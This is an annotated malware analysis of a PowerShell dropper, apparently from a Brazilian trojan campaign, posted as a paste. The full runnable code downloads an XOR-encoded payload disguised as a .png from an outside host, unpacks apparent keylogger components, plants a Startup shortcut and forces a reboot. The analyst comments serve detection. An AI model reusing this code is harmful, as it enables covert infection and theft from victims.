imagemdel

poweps1.ps1

Feb 28th, 2020 (edited)
text 4.20 KB | None | 0 0
  # Analyst note: run-once marker file. The path is %TEMP%\<name>, where <name> comes
  # from DateTime.ToString('yyyy2019.ini'): only "yyyy" is a date specifier (current
  # year); the remaining characters appear to be emitted literally, so a run in 2020
  # would presumably produce 20202019.ini. This file name is a host indicator.
  # ("strCaminhoArquivoLog" is Portuguese for "log file path".)
  1. $strCaminhoArquivoLog = "$env:TEMP\$([System.DateTime]::Now.ToString('yyyy2019.ini'))"
  2.  
  # True when the marker already exists; the install block guarded by this flag
  # later in the script is then skipped entirely.
  3. $bExisteArquivoLog = [System.IO.File]::Exists($strCaminhoArquivoLog)
  4.  
  # gera-strrand <count>: returns a string of $args[0] random ASCII letters.
  # Code points 65..90 (A-Z) and 97..122 (a-z) are sampled with Get-Random -Count,
  # cast to [char] and joined. The script uses it for every folder and file name it
  # creates, so those names differ per run and are poor static indicators; hunt on
  # the name lengths, locations and behaviour instead.
  5. function gera-strrand
  6. {
  7. -join ((65..90) + (97..122) | Get-Random -Count $args[0] | % {[char]$_})
  8. }
  9.  
  # Analyst summary of this block (runs only when the %TEMP% marker file is absent):
  #   1. writes the marker, 2. creates a dot-prefixed staging folder in a user
  #   profile location, 3. downloads a file served with a .png name, 4. XOR-decodes
  #   it in place (key 0x91) and unpacks it as a ZIP, 5. renames the unpacked files
  #   by size, 6. adds a Startup-folder shortcut for persistence, 7. reboots the host.
  # Detection surfaces: PowerShell script-block logging, a WebClient download to a
  # user-writable path, file creation in the Startup folder, an unexpected restart.
  10. if (-Not $bExisteArquivoLog)
  11. {
  # Create the (empty) marker so later runs take no action.
  12. "" | Set-Content $strCaminhoArquivoLog
  13.  
  # Staging folder name: "." followed by 3 random letters.
  14. $NomePasta = gera-strrand 3
  15.  
  16. $Directory = "." + $NomePasta
  17.  
  # Candidate parent directories for the staging folder. The array is seeded with the
  # integers 0..6 and slots 0-4 and 6 are overwritten with paths; slot 5 is not.
  18. $array = (0..6)
  19. $array[0] = [environment]::getfolderpath("MyDocuments")
  20. $array[1] = [environment]::getfolderpath("MyMusic")
  21. $array[2] = [environment]::getfolderpath("MyPictures")
  22. $array[3] = [environment]::getfolderpath("Templates")
  23. $array[4] = "$env:USERPROFILE\Microsoft\Windows"
  24. $array[6] = "$env:USERPROFILE\Microsoft"
  25.  
  # Get-Random -Maximum 6 yields 0..5, so hunting should cover the five paths in
  # slots 0-4 plus a relative "5\" directory (slot 5 still holds the integer 5).
  26. $Num = Get-Random -Maximum 6
  27.  
  # Full staging path: <parent>\.<3 letters>\  ("CaminhoPastaCaixa" = "box folder path").
  28. $strCaminhoPastaCaixa = $array[$Num] + "\" + $Directory + "\"
  29.  
  30. New-Item -ItemType directory -Path $strCaminhoPastaCaixa
  31.  
  # Local name for the download: 8 random letters + ".zip" inside the staging folder.
  32. $strCaminhoCaixaZipada = gera-strrand 8
  33.  
  34. $strCaminhoCaixaZipada = "$strCaminhoPastaCaixa$strCaminhoCaixaZipada.zip"
  35.  
  # Network indicator: the payload URL. The resource carries a .png name but is
  # handled below as an encoded ZIP archive, not as an image.
  36. $strUrlCaixaZipada = "https://filecentrals.com/camcm/camcm.png"
  37.  
  38. (New-Object System.Net.WebClient).DownloadFile($strUrlCaixaZipada, $strCaminhoCaixaZipada)
  39.  
  # Decode in place: every byte of the downloaded file is XORed with 0x91 and the
  # result is written back over the same path. Content inspection of the download in
  # transit therefore sees neither a PNG nor a ZIP header.
  40. $objBytesCaixaZipada = [System.IO.File]::ReadAllBytes($strCaminhoCaixaZipada)
  41. for($i=0; $i -lt $objBytesCaixaZipada.count; $i++)
  42. {
  43. $objBytesCaixaZipada[$i] = $objBytesCaixaZipada[$i] -bxor 0x91
  44. }
  45. [System.IO.File]::WriteAllBytes($strCaminhoCaixaZipada,$objBytesCaixaZipada)
  46.  
  # Unpack through the Shell.Application COM object (Explorer's ZIP folder support):
  # each archive item is copied into the staging folder and its name is recorded.
  47. $objArrayArqsZip = New-Object System.Collections.ArrayList
  48. $objShelApplication = New-Object -com shell.application
  49. $objArquivoZipado = $objShelApplication.NameSpace($strCaminhoCaixaZipada)
  50.  
  51. foreach($item in $objArquivoZipado.items())
  52. {
  53. $objShelApplication.Namespace($strCaminhoPastaCaixa).copyhere($item)
  54. $objArrayArqsZip.Add($item.name)
  55. }
  56.  
  # Random target names for the three unpacked components. Roles below are taken
  # from the author's variable names only - confirm against the actual payload:
  #   "ModuloDllKl"    -> 7 letters + "."    (a DLL module, per the name)
  #   "ModuloExecutor" -> 5 letters + ".exe" (the executable that is launched)
  #   "ScriptAutoIt"   -> 8 letters, no extension (an AutoIt script, per the name)
  57. $strNomeModuloDllKl = gera-strrand 7
  58. $strPathModuloDllKl = $strCaminhoPastaCaixa + $strNomeModuloDllKl + "."
  59.  
  60. $strNomeModuloExecutor = gera-strrand 5
  61. $strPathModuloExecutor = $strCaminhoPastaCaixa + $strNomeModuloExecutor + ".exe"
  62.  
  63. $strNomeScriptAutoIt = gera-strrand 8
  64. $strPathScriptAutoIt = $strCaminhoPastaCaixa + $strNomeScriptAutoIt
  # Components are told apart purely by file size, not by name or content:
  #   < 2000 bytes -> script name, < 1000000 bytes -> .exe name, otherwise -> module name.
  65. foreach ($element in $objArrayArqsZip)
  66. {
  67. $intTamArquivo = (Get-Item "$strCaminhoPastaCaixa$element").Length
  68. if ($intTamArquivo -lt 2000)
  69. {
  70. Rename-Item -Path "$strCaminhoPastaCaixa$element" -NewName $strPathScriptAutoIt
  71. }
  72. elseif ($intTamArquivo -lt 1000000)
  73. {
  74. Rename-Item -Path "$strCaminhoPastaCaixa$element" -NewName $strPathModuloExecutor
  75. }
  76. else
  77. {
  78. Rename-Item -Path "$strCaminhoPastaCaixa$element" -NewName $strPathModuloDllKl
  79. }
  80. }
  81.  
  # After a 5-second pause the decoded archive is deleted, so only the renamed
  # components remain in the staging folder for forensic collection.
  82. Start-Sleep -s 5
  83. Remove-Item -Path $strCaminhoCaixaZipada -Force
  # Persistence: a shortcut named <current user name>.lnk is written to the user's
  # Startup folder. It targets the renamed .exe, passes the script name and the module
  # name as arguments, and uses the staging folder as its working directory.
  # Triage: list .lnk files in the Startup folder and inspect target/arguments.
  84. $strNomeLNK = $env:UserName
  85. $objShell = New-Object -ComObject ("WScript.Shell")
  86. $startup = [environment]::getfolderpath("Startup")
  87. $objShortCut = $objShell.CreateShortcut($startup + "\" + $strNomeLNK + ".lnk")
  88. $objShortCut.TargetPath = $strPathModuloExecutor
  89. $objShortCut.Description = $strNomeModuloExecutor
  90. $objShortCut.Arguments = "$strNomeScriptAutoIt $strNomeModuloDllKl"
  91. $objShortCut.WorkingDirectory = $strCaminhoPastaCaixa
  # Further shortcut properties usable as indicators: hotkey CTRL+SHIFT+F and
  # icon index 29 from Shell32.dll.
  92. $objShortCut.Hotkey = "CTRL+SHIFT+F"
  93. $objShortCut.IconLocation = "Shell32.dll, 29";
  # Overwrites the description set above with 50 random letters.
  94. $objShortCut.Description = gera-strrand 50
  95. $objShortCut.Save()
  96.  
  # Restarts the machine (-F, presumably -Force); the Startup shortcut would then run
  # at the next logon. An unprompted reboot shortly after PowerShell activity is a
  # useful correlation point for responders.
  97. Restart-Computer -F
  98.  
  99. }